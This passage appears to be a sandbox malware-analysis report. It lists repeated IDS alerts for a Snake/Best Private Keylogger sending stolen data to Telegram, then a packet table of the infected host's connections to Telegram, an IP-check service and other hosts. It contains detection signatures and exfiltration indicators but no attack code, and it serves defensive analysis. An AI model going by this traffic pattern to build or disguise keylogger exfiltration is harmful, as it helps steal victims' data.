2025-01-10T22:44:09.672750+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50027	149.154.167.220	443	TCP
2025-01-10T22:44:10.067659+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50027	149.154.167.220	443	TCP
2025-01-10T22:44:11.303252+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50029	149.154.167.220	443	TCP
2025-01-10T22:44:11.615715+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50029	149.154.167.220	443	TCP
2025-01-10T22:44:12.813731+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50031	149.154.167.220	443	TCP
2025-01-10T22:44:13.222558+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50031	149.154.167.220	443	TCP
2025-01-10T22:44:14.526148+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50033	149.154.167.220	443	TCP
2025-01-10T22:44:14.906701+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50033	149.154.167.220	443	TCP
2025-01-10T22:44:16.120073+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50035	149.154.167.220	443	TCP
2025-01-10T22:44:16.461260+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50035	149.154.167.220	443	TCP
2025-01-10T22:44:17.685248+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50037	149.154.167.220	443	TCP
2025-01-10T22:44:18.073657+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50037	149.154.167.220	443	TCP
2025-01-10T22:44:19.289499+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50039	149.154.167.220	443	TCP
2025-01-10T22:44:19.745626+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50039	149.154.167.220	443	TCP
2025-01-10T22:44:20.978871+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50041	149.154.167.220	443	TCP
2025-01-10T22:44:21.411514+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50041	149.154.167.220	443	TCP
2025-01-10T22:44:22.609261+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50043	149.154.167.220	443	TCP
2025-01-10T22:44:23.038141+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50043	149.154.167.220	443	TCP
2025-01-10T22:44:24.287303+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50045	149.154.167.220	443	TCP
2025-01-10T22:44:24.633538+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50045	149.154.167.220	443	TCP
2025-01-10T22:44:25.834440+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50047	149.154.167.220	443	TCP
2025-01-10T22:44:26.106237+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50047	149.154.167.220	443	TCP
2025-01-10T22:44:27.319081+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50049	149.154.167.220	443	TCP
2025-01-10T22:44:27.698587+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50049	149.154.167.220	443	TCP
2025-01-10T22:44:28.908906+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50051	149.154.167.220	443	TCP
2025-01-10T22:44:29.441104+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50051	149.154.167.220	443	TCP
2025-01-10T22:44:30.704871+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50053	149.154.167.220	443	TCP
2025-01-10T22:44:30.987411+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50053	149.154.167.220	443	TCP
2025-01-10T22:44:32.205043+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50055	149.154.167.220	443	TCP
2025-01-10T22:44:32.503707+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50055	149.154.167.220	443	TCP
2025-01-10T22:44:33.725897+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50057	149.154.167.220	443	TCP
2025-01-10T22:44:33.964570+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50057	149.154.167.220	443	TCP
2025-01-10T22:44:35.183983+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50059	149.154.167.220	443	TCP
2025-01-10T22:44:35.501882+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50059	149.154.167.220	443	TCP
2025-01-10T22:44:36.713518+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50061	149.154.167.220	443	TCP
2025-01-10T22:44:37.002302+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50061	149.154.167.220	443	TCP
2025-01-10T22:44:38.299101+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50063	149.154.167.220	443	TCP
2025-01-10T22:44:38.669450+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50063	149.154.167.220	443	TCP
2025-01-10T22:44:39.887149+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50065	149.154.167.220	443	TCP
2025-01-10T22:44:40.277352+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50065	149.154.167.220	443	TCP
2025-01-10T22:44:41.504856+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50068	149.154.167.220	443	TCP
2025-01-10T22:44:41.777070+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50068	149.154.167.220	443	TCP
2025-01-10T22:44:43.037460+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50070	149.154.167.220	443	TCP
2025-01-10T22:44:43.444454+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50070	149.154.167.220	443	TCP
2025-01-10T22:44:44.746296+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50072	149.154.167.220	443	TCP
2025-01-10T22:44:45.313609+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50072	149.154.167.220	443	TCP
2025-01-10T22:44:46.512673+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50074	149.154.167.220	443	TCP
2025-01-10T22:44:46.861010+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50074	149.154.167.220	443	TCP
2025-01-10T22:44:48.048135+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50076	149.154.167.220	443	TCP
2025-01-10T22:44:48.356145+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50076	149.154.167.220	443	TCP
2025-01-10T22:44:49.593350+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50078	149.154.167.220	443	TCP
2025-01-10T22:44:50.021137+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50078	149.154.167.220	443	TCP
2025-01-10T22:44:51.329486+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50080	149.154.167.220	443	TCP
2025-01-10T22:44:51.657111+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50080	149.154.167.220	443	TCP
2025-01-10T22:44:52.859130+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50082	149.154.167.220	443	TCP
2025-01-10T22:44:53.187760+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50082	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 22:43:22.923286915 CET	49869	443	192.168.2.6	142.250.186.142
Jan 10, 2025 22:43:22.923353910 CET	443	49869	142.250.186.142	192.168.2.6
Jan 10, 2025 22:43:22.923480988 CET	49869	443	192.168.2.6	142.250.186.142
Jan 10, 2025 22:43:22.938307047 CET	49869	443	192.168.2.6	142.250.186.142
Jan 10, 2025 22:43:22.938319921 CET	443	49869	142.250.186.142	192.168.2.6
Jan 10, 2025 22:43:23.579087973 CET	443	49869	142.250.186.142	192.168.2.6
Jan 10, 2025 22:43:23.579241991 CET	49869	443	192.168.2.6	142.250.186.142
Jan 10, 2025 22:43:23.579857111 CET	443	49869	142.250.186.142	192.168.2.6
Jan 10, 2025 22:43:23.579916000 CET	49869	443	192.168.2.6	142.250.186.142
Jan 10, 2025 22:43:23.738732100 CET	49869	443	192.168.2.6	142.250.186.142
Jan 10, 2025 22:43:23.738748074 CET	443	49869	142.250.186.142	192.168.2.6
Jan 10, 2025 22:43:23.739059925 CET	443	49869	142.250.186.142	192.168.2.6
Jan 10, 2025 22:43:23.739113092 CET	49869	443	192.168.2.6	142.250.186.142
Jan 10, 2025 22:43:23.743503094 CET	49869	443	192.168.2.6	142.250.186.142
Jan 10, 2025 22:43:23.787338018 CET	443	49869	142.250.186.142	192.168.2.6
Jan 10, 2025 22:43:24.037074089 CET	443	49869	142.250.186.142	192.168.2.6
Jan 10, 2025 22:43:24.037168026 CET	49869	443	192.168.2.6	142.250.186.142
Jan 10, 2025 22:43:24.037193060 CET	443	49869	142.250.186.142	192.168.2.6
Jan 10, 2025 22:43:24.037236929 CET	49869	443	192.168.2.6	142.250.186.142
Jan 10, 2025 22:43:24.037244081 CET	443	49869	142.250.186.142	192.168.2.6
Jan 10, 2025 22:43:24.037288904 CET	49869	443	192.168.2.6	142.250.186.142
Jan 10, 2025 22:43:24.037321091 CET	49869	443	192.168.2.6	142.250.186.142
Jan 10, 2025 22:43:24.037338018 CET	443	49869	142.250.186.142	192.168.2.6
Jan 10, 2025 22:43:24.037344933 CET	49869	443	192.168.2.6	142.250.186.142
Jan 10, 2025 22:43:24.037380934 CET	49869	443	192.168.2.6	142.250.186.142
Jan 10, 2025 22:43:24.069421053 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:24.069464922 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:24.069559097 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:24.069912910 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:24.069931030 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:24.709721088 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:24.710210085 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:24.714365959 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:24.714386940 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:24.714699030 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:24.714904070 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:24.723520994 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:24.767339945 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.805438995 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.805535078 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.811347008 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.811425924 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.823787928 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.823884964 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.823899031 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.824095964 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.830080032 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.830141068 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.892003059 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.892070055 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.892163038 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.892182112 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.892231941 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.894737959 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.895494938 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.895505905 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.895560026 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.901045084 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.903477907 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.903490067 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.903568983 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.907248020 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.907309055 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.907342911 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.907397032 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.913734913 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.915483952 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.915496111 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.915539026 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.920037985 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.923500061 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.923511028 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.923573017 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.926208019 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.927485943 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.927495956 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.927548885 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.932595968 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.933828115 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.933839083 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.933886051 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.938409090 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.939511061 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.939521074 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.939575911 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.944509983 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.947483063 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.947495937 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.947542906 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.950128078 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.951486111 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.951495886 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.951543093 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.955753088 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.959492922 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.959507942 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.962097883 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.962107897 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.962179899 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.978665113 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.978737116 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.978766918 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.978820086 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.978882074 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.979038000 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.979089022 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.979099035 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.979466915 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.981065035 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.983489037 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.983500957 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.983549118 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.986912012 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.987057924 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.987098932 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.987108946 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.987134933 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.987178087 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.992266893 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.995500088 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.995517969 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.997895956 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.997965097 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:27.997973919 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:27.999476910 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.002716064 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.003509998 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.003524065 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.003571987 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.007689953 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.011491060 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.011501074 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.011557102 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.012442112 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.012495995 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.012501955 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.012556076 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.017235041 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.017548084 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.017564058 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.017621040 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.021827936 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.021900892 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.021910906 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.023480892 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.026618004 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.026679993 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.026715994 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.027503967 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.031183004 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.031246901 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.031276941 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.031487942 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.035761118 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.039494991 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.039504051 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.039561987 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.040203094 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.043473005 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.043487072 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.043556929 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.044400930 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.044452906 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.044487953 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.044761896 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.044828892 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.044836998 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.044867039 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.044893026 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:28.044897079 CET	443	49875	172.217.18.97	192.168.2.6
Jan 10, 2025 22:43:28.044959068 CET	49875	443	192.168.2.6	172.217.18.97
Jan 10, 2025 22:43:29.160641909 CET	49910	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:29.165496111 CET	80	49910	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:29.165622950 CET	49910	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:29.165944099 CET	49910	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:29.170871019 CET	80	49910	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:30.056500912 CET	80	49910	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:30.063294888 CET	49910	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:30.068085909 CET	80	49910	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:30.356193066 CET	80	49910	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:30.402571917 CET	49910	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:30.687593937 CET	49921	443	192.168.2.6	104.21.80.1
Jan 10, 2025 22:43:30.687633991 CET	443	49921	104.21.80.1	192.168.2.6
Jan 10, 2025 22:43:30.687896967 CET	49921	443	192.168.2.6	104.21.80.1
Jan 10, 2025 22:43:30.689919949 CET	49921	443	192.168.2.6	104.21.80.1
Jan 10, 2025 22:43:30.689929008 CET	443	49921	104.21.80.1	192.168.2.6
Jan 10, 2025 22:43:31.170124054 CET	443	49921	104.21.80.1	192.168.2.6
Jan 10, 2025 22:43:31.170222044 CET	49921	443	192.168.2.6	104.21.80.1
Jan 10, 2025 22:43:31.173501968 CET	49921	443	192.168.2.6	104.21.80.1
Jan 10, 2025 22:43:31.173518896 CET	443	49921	104.21.80.1	192.168.2.6
Jan 10, 2025 22:43:31.173824072 CET	443	49921	104.21.80.1	192.168.2.6
Jan 10, 2025 22:43:31.177674055 CET	49921	443	192.168.2.6	104.21.80.1
Jan 10, 2025 22:43:31.223328114 CET	443	49921	104.21.80.1	192.168.2.6
Jan 10, 2025 22:43:31.311913967 CET	443	49921	104.21.80.1	192.168.2.6
Jan 10, 2025 22:43:31.311978102 CET	443	49921	104.21.80.1	192.168.2.6
Jan 10, 2025 22:43:31.312216997 CET	49921	443	192.168.2.6	104.21.80.1
Jan 10, 2025 22:43:31.318082094 CET	49921	443	192.168.2.6	104.21.80.1
Jan 10, 2025 22:43:36.955414057 CET	49910	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:36.960405111 CET	80	49910	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:37.235462904 CET	80	49910	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:37.247426987 CET	49964	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:37.247456074 CET	443	49964	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:37.247544050 CET	49964	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:37.247997999 CET	49964	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:37.248013020 CET	443	49964	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:37.277591944 CET	49910	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:37.867079973 CET	443	49964	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:37.867221117 CET	49964	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:37.869036913 CET	49964	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:37.869044065 CET	443	49964	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:37.869290113 CET	443	49964	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:37.871284962 CET	49964	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:37.911324024 CET	443	49964	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:37.911425114 CET	49964	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:37.911429882 CET	443	49964	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:38.290793896 CET	443	49964	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:38.290894032 CET	443	49964	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:38.290972948 CET	49964	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:38.291693926 CET	49964	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:38.451124907 CET	49910	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:38.452522993 CET	49973	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:38.457045078 CET	80	49910	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:38.457117081 CET	49910	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:38.457427025 CET	80	49973	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:38.457513094 CET	49973	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:38.457655907 CET	49973	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:38.462457895 CET	80	49973	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:39.295414925 CET	80	49973	132.226.8.169	192.168.2.6
Jan 10, 2025 22:43:39.296737909 CET	49978	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:39.296792030 CET	443	49978	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:39.296860933 CET	49978	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:39.297451973 CET	49978	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:39.297466040 CET	443	49978	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:39.340074062 CET	49973	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:43:39.936533928 CET	443	49978	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:39.938317060 CET	49978	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:39.938349962 CET	443	49978	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:39.938410044 CET	49978	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:43:39.938420057 CET	443	49978	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:40.404019117 CET	443	49978	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:40.404150963 CET	443	49978	149.154.167.220	192.168.2.6
Jan 10, 2025 22:43:40.404213905 CET	49978	443	192.168.2.6	149.154.167.220
